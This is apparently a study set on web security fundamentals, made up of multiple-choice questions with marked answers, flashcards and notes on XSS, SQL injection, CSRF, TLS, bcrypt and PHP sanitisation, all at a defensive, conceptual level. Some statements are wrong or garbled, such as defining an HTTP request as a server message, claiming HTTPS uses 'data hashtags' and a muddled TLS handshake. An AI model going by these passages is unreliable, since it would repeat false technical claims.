Web Security Fundamentals

Questions and Answers

Which security measure directly addresses the risk of unauthorized access by ensuring users are who they claim to be?

• Data encryption
• Authentication and access control (correct)
• Vulnerability management
• Network security

Why is it crucial to validate every user-generated input in web applications?

• To improve server response time and reduce bandwidth usage.
• To optimize website loading speed on different browsers.
• To ensure data consistency across different databases.
• To prevent attackers from injecting malicious code and exploiting vulnerabilities. (correct)

Which type of attack involves tricking a user into performing unwanted actions on a web application in which they're authenticated?

• CSRF (correct)
• XSS
• AiTM
• DDoS

What is a primary security concern when using HTTP compared to HTTPS?

HTTP does not encrypt data, making it vulnerable to interception. (B)

How does a Secure Web Gateway (SWG) contribute to web security?

By enforcing security policies and blocking unwanted traffic. (D)

What is the significance of the padlock icon in a browser's address bar?

It signifies the site has a valid SSL/TLS certificate. (A)

Which of the following is a key characteristic of Bcrypt that enhances password security?

It automatically generates and stores a unique salt for each password. (C)

In the context of web security, what does 'browser isolation' primarily aim to achieve?

Loading webpages in a remote browser and only sending pixel data to the user. (B)

What is the primary function of the htmlspecialchars() function in preventing Cross-Site Scripting (XSS) attacks?

Converting special HTML characters into entities. (C)

When implementing a defense against SQL injection attacks, why is it important to 'Distrust User Input'?

To avoid directly using user input in SQL queries without validation or sanitization. (A)

Flashcards

Web security

Aims to protect data/network resources from online threats using a multi-layered approach.

Authentication and access control

Verifying user identities through methods like MFA and RBAC.

Data Encryption

Sensitive data is shielded with SSL/TLS during transfer and in databases.

Network security

Using firewalls, IDS, and VPNs to protect the underlying infrastructure.

User education

Training and awareness initiatives to educate users.

SQL injection

A attack where malformed SQL statements from forms can alter database content.

Cross-site scripting (XSS)

Occurs when web pages fail to validate user input, reflecting malicious code back to the user.

Remote file inclusion

Web apps using dynamic external scripts become vulnerable when user input isn't validated.

Password Breach

Administrators use monitors/detection to stop password breaches. Two-factor authentication can help prevent this.

Data breach

A data breach happens when unauthorized access occurs and sensitive data is stolen.

Study Notes

• Web security aims to safeguard data and network resources from online threats
• A multi-layered approach is used to protect websites and applications

Authentication and Access Control

• Verifying user identities through multifactor authentication (MFA) and role-based access control (RBAC)

Data Encryption

• Sensitive data is protected using SSL/TLS for data in transit and database encryption

Vulnerability Management and Testing

• Regular updates and security audits are necessary

Network Security

• Implemented through firewalls, Intrusion Detection Systems (IDS), and Virtual Private Networks (VPNs)

User Education

• Training programs and awareness initiatives are important

Monitoring and Incident Response

• Continuous monitoring through Security Information and Event Management (SIEM) systems is required

Common Cybersecurity Threats

• Malicious websites
• Credential theft
• Social Engineering
• Phishing emails
• Insider threats
• Website vulnerabilities
• Malware
• Advanced persistent threats (APTs)
• Distributed denial-of-service (DDoS) attacks
• SQL injection and cross-site scripting (XSS)
• Zero-day exploits
• Ransomware
• Supply chain attacks

Threats web security prevents

• SQL injection uses malformed SQL statements from online forms to change data, delete tables, and escalate privileges
• Cross-site scripting (XSS) reflects malicious code back to the user when web pages don't validate user input
• Remote file inclusion is when web applications using dynamic external scripts are attacked through unvalidated paths, leading to malware upload
• Password breaches can be prevented with monitors, intrusion detection, and two-factor authentication
• Data breaches occur when a third party steals sensitive information

Code Injection

• Attackers send malicious code to open vulnerabilities if user-generated input isn't validated

Malware Installation

• Malware on a local network allows attackers to steal data and infect machines with ransomware

Phishing

• Many cyber-attacks begin with a phishing email
• Web security strategies must stop malicious emails

Distributed Denial-of-Service (DDoS)

• Attackers interrupt services by flooding servers or networks with traffic

Adversary-in-the-Middle (AiTM)

• Attacks intercept communication between two parties, potentially eavesdropping or altering data

Cross-Site Request Forgery (CSRF)

• Attacks trick users into performing unwanted actions on web applications where they're authenticated

API Vulnerabilities

• Securing APIs is crucial to prevent unauthorized access, data leaks, and system compromises

Threats Stopped by Web Security

• Malware is blocked using antivirus software and other cybersecurity tools
• Data theft is prevented by blocking unauthorized users from exfiltrating sensitive information
• Phishing is mitigated by filtering malicious emails
• Session hijacking is prevented by web filtering and protection
• Malicious redirects are stopped through blocking redirection to known attack sites
• Spam is blocked to conserve storage space
• Advanced persistent threats are detected and stopped early with multiple layers of security
• Shadow IT is prevented by blocking unauthorized devices from connecting to the network

Ransomware

• Attacks encrypt data and demand a ransom payment for decryption

General Malware

• Variants can cause data leaks, spying, unauthorized access, lockouts, errors, and system crashes

Phishing Attacks

• Carried out through email, text messages, or malicious websites, tricking users into divulging login credentials or downloading spyware

SQL Injection

• Exploits input vulnerabilities in database servers, allowing command execution for data retrieval, manipulation, or deletion

Denial of Service (DoS)

• Attacks slow or shut down network devices by overloading them with data

Cross-Site Scripting (XSS)

• Attackers introduce malicious code to trusted websites through unprotected user input fields

Secure Web Gateway (SWG)

• Offers protection and policy enforcement to prevent infections and block unwanted traffic

Firewall/IPS

• Provides network security, app control, and visibility
• Cloud firewalls stay up-to-date and scale to handle demand or encryption

URL Filtering

• Screens and blocks inappropriate access or content, protecting from web-borne malware

Sandboxing

• Isolates software for safe scanning and execution

Browser Isolation

• Loads webpages/apps remotely, sending only user pixels to prevent data compromise

DNS Controls

• Define rules to control DNS traffic, detecting and preventing abuses like tunneling

Antivirus Software

• Detects and neutralizes trojans, spyware, ransomware, and protects against malicious URLs, phishing, and DDoS

TLS/SSL Decryption

• Breaks open and re-encrypts encrypted traffic for inspection

Definition of Asset

• Any valuable data, device, or component

Definition of Vulnerability

• An organizational flaw that can be exploited

Definition of Threat

• Any incident that could negatively affect an asset

Threats to Confidentiality

• Compromise sensitive information to unauthorized individuals

Intentional

• Phishing tricks users into revealing personal data
• Man-in-the-Middle (MITM) intercepts sensitive data during transmission
• Insider Threat: A malicious employee leaking confidential data

Accidental

• Misconfigured databases and sending sensitive emails to unintended recipients

Threats to Integrity

• Unauthorized modification or destruction of data

Intentional

• SQL Injection: Altering database records to manipulate data
• Defacement: Attacking a website to modify its content
• Supply Chain Attack: Injecting malicious code into third-party software

Accidental

• Mistakenly overwriting critical data during a software update and software bugs causing unintended data corruption

Threats to Availability

• Prevent legitimate users from accessing resources or services

Intentional

• Distributed Denial of Service (DDoS) overwhelms a server to make it inaccessible
• Ransomware encrypting files and demanding payment to restore access

Accidental

• Hardware failure and Human error causing system outages

Combination Threats (Affecting Multiple Aspects)

• Data breaches and malware

The HyperText Transfer Protocol

• HTTP transfers data from one computer to another
• Invented by Tim Berner
• Secure Sockets Layer (SSL) certifies HTTPS
• HTTPS is more secure because of its certification

HTTP Request

• A message sent by the server to the client in response to an Http request

HTTPS Characteristics

• HTTPS encrypts all message substance
• HTTPS sees more use by web clients than the first non-secure HTTP

Speed

• HTTP is faster
• HTTPS is slower

Data tags

• HTTP does not use data hashtags
• HTTPS uses data hashtags

Use

• HTTP used to transfer text, video and image via web pages
• HTTPS used to transfer data securely via a network

HTTP Status Code

• Issued by a server in response to a client's request
• Includes codes from IETF Request for Comments (RFCs)

SSL vs TLS

• SSL deprecated due to vulnerabilities
• TLS 1.0 and 1.1 are also deprecated
• TLS 1.2 is widely used and more secure
• TLS 1.3 is the latest version offering the most robust security

Visual Indicators of SSL/TLS

• HTTPS in the URL and a Padlock Icon indicating a valid SSL/TLS certificate
• Extended Validation (EV) certificates may display the organization's name next to the URL

SSL/TLS Certificates

• SSL/TLS Handshake when a browser connects to a secure website; the server presents its SSL/TLS certificate
• Verification the browser verifies the certificate's validity through a trusted Certificate Authority (CA)
• Session Key Creation the browser generates a symmetric session key if the certificate is valid
• Encryption the server decrypts the session key using its private key
• Secure Connection a safe connection is established, with all transmitted data encrypted using the symmetric session key

Security Through Authorization

• Database integration integrates application with a database like MySQL to store user credentials.
• Configuration in .htaccess with the .htaccess file setting up basic HTTP authentication
• Security transmits credentials in plain text, making it less secure for production environments
• Advanced authentication methods like session management, token-based authentication, or OAuth within application logic, leveraging the capabilities of PHP.

Bcrypt for Secure Password Storage

• One-Way Hashing and Irreversible
• Salting for Additional Security with a unique, randomly generated string added to each password before hashing
• Adaptive Work Factor (Cost Factor) controls the computational difficulty of hashing

Key Concepts of Bcrypt

• Automatic Salt Handling is handled automatically generates and stores the salt within the hash itself
• Comparison Instead of Decryption enables hash comparison

Why use Bcrypt

• Strong resistance to brute-force attacks
• Protection against hash collision attacks
• Slow hashing mechanism, making large-scale password cracking difficult
• Built-in salting, eliminating the need for manual salt management

Validation and Sanitation

• Will help you ensure the quality and safety of user input and output
• Validate user input using HTML5 attributes to validate form fields on the client-side
• Sanitize user output, especially if it comes from external or untrusted sources

Types of Attacks Thwarted by Input Validation

• SQL Injection code
• Cross-Site Scripting (XSS) scripts
• Command Injection commands
• filter_var() – Validating and Sanitizing Input

Validation

• Checking for if a particular output is valid
• Examples include: Email, URL and Integer

Sanitization

• Checking the output for unwanted characters.
• Examples include: String and Integers, used by default

Prevent XSS

• “htmlspecialchars()” is used to convert special HTML characters into entities, preventing XSS attacks

Encoding Characters

• htmlentities() – Converts All Characters

Removing Unecessary Symbols

• strip_tags() – Removing HTML Tags
• trim() – Removing Unnecessary Whitespace and its variants

Types of XSS attacks

• Reflected XSS - Where the malicious script comes from the current HTTP request
• Stored XSS - Where the malicious script comes from the website's database
• DOM-based XSS - Where the vulnerability exists in client-side code rather than server-side code

Uses of XSS Attacks

• Impersonate or masquerade as the victim user
• Carry out any action that the user is able to perform
• Read any data that the user is able to access
• Capture the user's login credentials
• Perform virtual defacement of the website
• Inject trojan functionality into the website

Types of SQLi - SQL Injection Attack

• Regular” SQL injection – in-band
• Advanced indirect technique with chunks of data – blind
• One in which use of different channels – out-of-band
• Similar to stored XSS; uses SQLi payloads – second-order

How to protect against SQLi - SQL Injection Attack

• Training & Awareness, train and maintain awareness
• Distrust User Input, never trust any user input
• Whitelists Only, don't filter user input based on blacklist
• Latest Tech adopt the latest technologies
• Employ Verified Mechanism, don't build soli protection from scratch
• Regularly scan and check with Acunetix